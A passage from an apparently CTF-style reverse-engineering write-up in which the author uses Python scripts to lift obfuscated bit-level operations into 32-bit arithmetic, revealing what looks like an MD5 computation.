        <span class="n">in2</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span>
        <span class="n">op</span> <span class="o">=</span> <span class="n">OP_MAP</span><span class="p">[</span><span class="n">inst</span><span class="p">.</span><span class="n">mnemonic</span><span class="p">]</span>

        <span class="n">inst</span> <span class="o">=</span> <span class="nb">next</span><span class="p">(</span><span class="n">instructions</span><span class="p">)</span>
        <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'byte ptr \[rax( \+ (\w+)|)\], cl'</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">)</span>
        <span class="n">out</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span>

        <span class="n">commands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">out</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">] = A[</span><span class="si">{</span><span class="n">in1</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">] </span><span class="si">{</span><span class="n">op</span><span class="si">}</span><span class="s"> A[</span><span class="si">{</span><span class="n">in2</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">]'</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">commands</span><span class="p">))</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'commands.txt'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">commands</span><span class="p">:</span>
        <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">cmd</span> <span class="o">+</span> <span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>
</code></pre></div></div>

<p>I also printed out the number of commands, which came out at a respectable 60,180. Still far from
being ideal of course.</p>

<p>Given the description of the challenge, I figured this was some hashing algorithm that was
obfuscated by bit manipulations. Looking through the <code class="language-plaintext highlighter-rouge">commands.txt</code> file, I noticed that there was a
lot of repetition. In fact, it almost always performed one of <code class="language-plaintext highlighter-rouge">&amp;</code>, <code class="language-plaintext highlighter-rouge">|</code>, or <code class="language-plaintext highlighter-rouge">^</code> in 32-bit chunks like
this:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">A</span><span class="p">[</span><span class="mh">0x0</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfa0</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x100</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0x1</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfa1</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x101</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0x2</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfa2</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x102</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0x3</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfa3</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x103</span><span class="p">]</span>
<span class="p">...</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0x1f</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfbf</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x11f</span><span class="p">]</span>
</code></pre></div></div>

<p>However, there were also certain chunks that had all the operators combined in a mixed order, which
strangely always came in groups of 157 that repeated <code class="language-plaintext highlighter-rouge">^, ^, &amp;, &amp;, |</code> cylically.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">A</span><span class="p">[</span><span class="mh">0xe7</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc7</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x27</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc7</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x27</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc6</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x26</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xe6</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc6</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x26</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc5</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x25</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xe5</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc5</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x25</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc4</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x24</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xe4</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
</code></pre></div></div>

<p>At first, this made me scratch my head as it did not seem to “fit” with the rest of the output. But
then I realized that this obscure-looking block of code was actually implementing a 32-bit adder!</p>

<p>This finally made sense with the rest of the logic, and once I was certain that these were all
indeed 32-bit operations implemented on bits, I quickly hacked together a second program to convert
the 60,180 commands into a new set of commands performed on 32-bit integers:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>

<span class="k">def</span> <span class="nf">MOV</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
    <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'A\[(\w+)\] = ([01])'</span><span class="p">,</span> <span class="n">cmd</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">m</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>
    <span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>

<span class="k">def</span> <span class="nf">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
    <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'A\[(\w+)\] = A\[(\w+)\] ([\^|&amp;]) A\[(\w+)\]'</span><span class="p">,</span> <span class="n">cmd</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">m</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>
    <span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">),</span> <span class="n">m</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'commands.txt'</span><span class="p">,</span> <span class="s">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">commands</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="nb">str</span><span class="p">.</span><span class="n">rstrip</span><span class="p">,</span> <span class="n">f</span><span class="p">))</span>

<span class="n">ncommands</span> <span class="o">=</span> <span class="p">[]</span>

<span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="n">idx</span> <span class="o">&lt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">commands</span><span class="p">):</span>
    <span class="n">cmd</span> <span class="o">=</span> <span class="n">commands</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">MOV</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">commands</span><span class="p">[</span><span class="n">idx</span><span class="p">:</span><span class="n">idx</span><span class="o">+</span><span class="mi">32</span><span class="p">]</span>
        <span class="n">outs</span><span class="p">,</span> <span class="n">vals</span> <span class="o">=</span> <span class="nb">zip</span><span class="p">(</span><span class="o">*</span><span class="p">[</span><span class="n">MOV</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">chunk</span><span class="p">])</span>
        <span class="k">assert</span> <span class="n">outs</span> <span class="o">==</span> <span class="nb">tuple</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">outs</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">))</span> <span class="ow">and</span> <span class="n">outs</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
        <span class="n">val</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="k">for</span> <span class="n">o</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">outs</span><span class="p">,</span> <span class="n">vals</span><span class="p">):</span>
            <span class="n">i</span> <span class="o">=</span> <span class="n">o</span> <span class="o">&amp;</span> <span class="mi">31</span>
            <span class="n">val</span> <span class="o">|=</span> <span class="n">v</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span> <span class="o">*</span> <span class="p">(</span><span class="n">i</span> <span class="o">//</span> <span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="mi">7</span> <span class="o">-</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">8</span><span class="p">)</span>
        <span class="n">ncommands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">outs</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] = </span><span class="si">{</span><span class="n">val</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
        <span class="n">idx</span> <span class="o">+=</span> <span class="mi">32</span>
    <span class="k">elif</span> <span class="n">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="ow">and</span> <span class="n">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="n">BITW</span><span class="p">(</span><span class="n">commands</span><span class="p">[</span><span class="n">idx</span> <span class="o">+</span> <span class="mi">1</span><span class="p">])[</span><span class="mi">1</span><span class="p">]:</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">commands</span><span class="p">[</span><span class="n">idx</span><span class="p">:</span><span class="n">idx</span><span class="o">+</span><span class="mi">32</span><span class="p">]</span>
        <span class="n">outs</span><span class="p">,</span> <span class="n">ops</span><span class="p">,</span> <span class="n">in1s</span><span class="p">,</span> <span class="n">in2s</span> <span class="o">=</span> <span class="nb">zip</span><span class="p">(</span><span class="o">*</span><span class="p">[</span><span class="n">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">chunk</span><span class="p">])</span>
        <span class="k">if</span> <span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">assert</span> <span class="n">outs</span> <span class="o">==</span> <span class="nb">tuple</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">outs</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="ow">and</span> <span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
            <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="nb">set</span><span class="p">(</span><span class="n">ops</span><span class="p">))</span> <span class="o">==</span> <span class="mi">1</span>
            <span class="k">assert</span> <span class="n">in1s</span> <span class="o">==</span> <span class="nb">tuple</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">in1s</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">in1s</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="ow">and</span> <span class="n">in1s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
            <span class="k">assert</span> <span class="n">in2s</span> <span class="o">==</span> <span class="nb">tuple</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">in2s</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">in2s</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="ow">and</span> <span class="n">in2s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
            <span class="n">ncommands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] = A[</span><span class="si">{</span><span class="n">in1s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] </span><span class="si">{</span><span class="n">ops</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s"> A[</span><span class="si">{</span><span class="n">in2s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">]'</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">rotl</span> <span class="o">=</span> <span class="p">(</span><span class="n">outs</span><span class="p">.</span><span class="n">index</span><span class="p">(</span><span class="nb">min</span><span class="p">(</span><span class="n">outs</span><span class="p">)</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mi">31</span>
            <span class="n">ncommands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">outs</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] = rotl(A[</span><span class="si">{</span><span class="n">in1s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] </span><span class="si">{</span><span class="n">ops</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s"> A[</span><span class="si">{</span><span class="n">in2s</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">], </span><span class="si">{</span><span class="n">rotl</span><span class="si">}</span><span class="s">)'</span><span class="p">)</span>
            <span class="k">assert</span> <span class="p">[</span><span class="n">in1s</span><span class="p">[</span><span class="mi">24</span> <span class="o">-</span> <span class="mi">8</span> <span class="o">*</span> <span class="p">(</span><span class="n">i</span> <span class="o">//</span> <span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">8</span><span class="p">)]</span> <span class="o">-</span> <span class="nb">min</span><span class="p">(</span><span class="n">in1s</span><span class="p">)</span> <span class="o">==</span> <span class="n">i</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">32</span><span class="p">)]</span>
            <span class="k">assert</span> <span class="p">[</span><span class="n">in2s</span><span class="p">[</span><span class="mi">24</span> <span class="o">-</span> <span class="mi">8</span> <span class="o">*</span> <span class="p">(</span><span class="n">i</span> <span class="o">//</span> <span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">8</span><span class="p">)]</span> <span class="o">-</span> <span class="nb">min</span><span class="p">(</span><span class="n">in2s</span><span class="p">)</span> <span class="o">==</span> <span class="n">i</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">32</span><span class="p">)]</span>
        <span class="n">idx</span> <span class="o">+=</span> <span class="mi">32</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">commands</span><span class="p">[</span><span class="n">idx</span><span class="p">:</span><span class="n">idx</span><span class="o">+</span><span class="mi">157</span><span class="p">]</span>
        <span class="n">outs</span><span class="p">,</span> <span class="n">ops</span><span class="p">,</span> <span class="n">in1s</span><span class="p">,</span> <span class="n">in2s</span> <span class="o">=</span> <span class="nb">zip</span><span class="p">(</span><span class="o">*</span><span class="p">[</span><span class="n">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">chunk</span><span class="p">])</span>
        <span class="k">assert</span> <span class="n">outs</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb40</span><span class="p">)</span> <span class="o">==</span> <span class="mi">63</span> <span class="ow">and</span> <span class="n">outs</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb41</span><span class="p">)</span> <span class="o">==</span> <span class="mi">62</span>
        <span class="k">assert</span> <span class="n">ops</span> <span class="o">==</span> <span class="p">(</span><span class="s">'^'</span><span class="p">,</span> <span class="s">'&amp;'</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="s">'^'</span><span class="p">,</span> <span class="s">'^'</span><span class="p">,</span> <span class="s">'&amp;'</span><span class="p">,</span> <span class="s">'&amp;'</span><span class="p">,</span> <span class="s">'|'</span><span class="p">)</span> <span class="o">*</span> <span class="mi">31</span>
        <span class="k">assert</span> <span class="n">in1s</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb40</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">in1s</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb41</span><span class="p">)</span> <span class="o">==</span> <span class="mi">93</span>
        <span class="k">assert</span> <span class="n">in2s</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb40</span><span class="p">)</span> <span class="o">==</span> <span class="mi">93</span> <span class="ow">and</span> <span class="n">in2s</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="mh">0xb41</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span>
        <span class="k">assert</span> <span class="n">outs</span><span class="p">[</span><span class="mi">33</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">in1s</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">in2s</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mi">31</span> <span class="o">==</span> <span class="mi">0</span>
        <span class="n">ncommands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">outs</span><span class="p">[</span><span class="mi">33</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] = A[</span><span class="si">{</span><span class="n">in1s</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">] + A[</span><span class="si">{</span><span class="n">in2s</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span><span class="o">&gt;&gt;</span><span class="mi">5</span><span class="si">}</span><span class="s">]'</span><span class="p">)</span>
        <span class="n">idx</span> <span class="o">+=</span> <span class="mi">157</span>

<span class="k">print</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">ncommands</span><span class="p">))</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'commands2.txt'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">ncommands</span><span class="p">:</span>
        <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">cmd</span> <span class="o">+</span> <span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>
</code></pre></div></div>

<p>There were some tricky implementation details like <code class="language-plaintext highlighter-rouge">rotl()</code> somehow being part of the logic, but in
the end we are left with a much simpler program with “only” 865 lines:</p>

<div class="highlight" style="height:300px;">
<pre class="highlight">
<code>A[9] = 0xffffffff
A[125] = 0x0
A[126] = 0x0
A[127] = 0x0
A[128] = 0x0
A[0] = A[125] | A[8]
A[1] = A[126] | A[8]
A[2] = A[127] | A[8]
A[3] = A[128] | A[8]
A[10] = 0xd76aa478
A[11] = 0xe8c7b756
A[12] = 0x242070db
A[13] = 0xc1bdceee
A[14] = 0xf57c0faf
A[15] = 0x4787c62a
A[16] = 0xa8304613
A[17] = 0xfd469501
A[18] = 0x698098d8
A[19] = 0x8b44f7af
A[20] = 0xffff5bb1
A[21] = 0x895cd7be
A[22] = 0x6b901122
A[23] = 0xfd987193
A[24] = 0xa679438e
A[25] = 0x49b40821
A[26] = 0xf61e2562
A[27] = 0xc040b340
A[28] = 0x265e5a51
A[29] = 0xe9b6c7aa
A[30] = 0xd62f105d
A[31] = 0x2441453
A[32] = 0xd8a1e681
A[33] = 0xe7d3fbc8
A[34] = 0x21e1cde6
A[35] = 0xc33707d6
A[36] = 0xf4d50d87
A[37] = 0x455a14ed
A[38] = 0xa9e3e905
A[39] = 0xfcefa3f8
A[40] = 0x676f02d9
A[41] = 0x8d2a4c8a
A[42] = 0xfffa3942
A[43] = 0x8771f681
A[44] = 0x6d9d6122
A[45] = 0xfde5380c
A[46] = 0xa4beea44
A[47] = 0x4bdecfa9
A[48] = 0xf6bb4b60
A[49] = 0xbebfbc70
A[50] = 0x289b7ec6
A[51] = 0xeaa127fa
A[52] = 0xd4ef3085
A[53] = 0x4881d05
A[54] = 0xd9d4d039
A[55] = 0xe6db99e5
A[56] = 0x1fa27cf8
A[57] = 0xc4ac5665
A[58] = 0xf4292244
A[59] = 0x432aff97
A[60] = 0xab9423a7
A[61] = 0xfc93a039
A[62] = 0x655b59c3
A[63] = 0x8f0ccc92
A[64] = 0xffeff47d
A[65] = 0x85845dd1
A[66] = 0x6fa87e4f
A[67] = 0xfe2ce6e0
A[68] = 0xa3014314
A[69] = 0x4e0811a1
A[70] = 0xf7537e82
A[71] = 0xbd3af235
A[72] = 0x2ad7d2bb
A[73] = 0xeb86d391
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[10]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[11]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[12]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[13]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
